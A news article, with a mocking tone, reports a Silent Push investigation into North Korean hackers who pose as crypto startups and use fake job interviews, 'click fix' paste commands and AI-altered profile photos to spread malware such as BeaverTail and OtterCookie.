North Korean Hackers Pose as Crypto Employers to Spread Malware—Because Even Cybercrime Has a Side Hustle Now

Lazarus Group strikes again—this time using fake blockchain job offers as bait. Their latest scheme? Impersonating legitimate crypto startups to deliver malware via ’recruitment opportunities.’ Because nothing says ’trust us with your digital future’ like a North Korean IP address.

How it works: Hackers set up polished LinkedIn profiles and company websites for sham crypto firms. Targets receive too-good-to-be-true job offers—only to download malware-laden ’technical assessments.’ Classic case of ’if the APY sounds unreal, the employer probably is too.’

The kicker? These operations specifically target DeFi developers and crypto-savvy professionals. Because why mine bitcoin when you can just steal it from people who already did the work?

Security experts warn this marks an escalation in DPRK’s crypto-focused cyberwarfare. Meanwhile, VC-backed web3 startups continue paying 7-figure salaries for ’community growth hackers’—proving the crypto job market was already surreal before nation-state actors joined the talent hunt.

Malware disguised as interview tools

The fake interview process typically involves a request for an introductory video. When applicants try to upload the video, they encounter an error. They’re then given a quick-fix solution of a copy-and-paste command that secretly delivers malware.

Edwards said:

“During the job application process an error message is displayed as someone tries to record an introduction video and the ‘solution’ is an easy ‘click fix’ copy and paste trick, which leads to malware if the unsuspecting developer completes the process.”

Silent Push identified three distinct malware strains used in this campaign: BeaverTail, InvisibleFerret, and OtterCookie. These tools give hackers remote access to victims’ devices and allow them to extract sensitive information.

The attackers use services like Astrill VPN and residential proxies to cover their tracks, making their infrastructure difficult to trace.

AI-generated identities

Beyond malware, the North Korean attackers rely heavily on fake AI personas to perform their nefarious activities.

Silent Push found that the threat actors use AI tools like Remaker AI to generate fake employee photos. Sometimes, they even alter real images to create deceptive profiles that look nearly authentic.

Edwards said:

“There are numerous fake employees and stolen images from real people being used across this network…In one of the [cases], the threat actors took a real photo from a real person, and then appeared to have run it through an ‘AI image modifier tool’ to create a subtly different version of that same image.”

This development marks a dangerous evolution in cybercrime targeting the crypto space. The combination of malware, social engineering, and AI-generated identities signals a growing threat.

Edwards concluded:

“This investigation is a perfect example of what happens when threat actors continue to uplevel their efforts one campaign after the next, without facing justice.”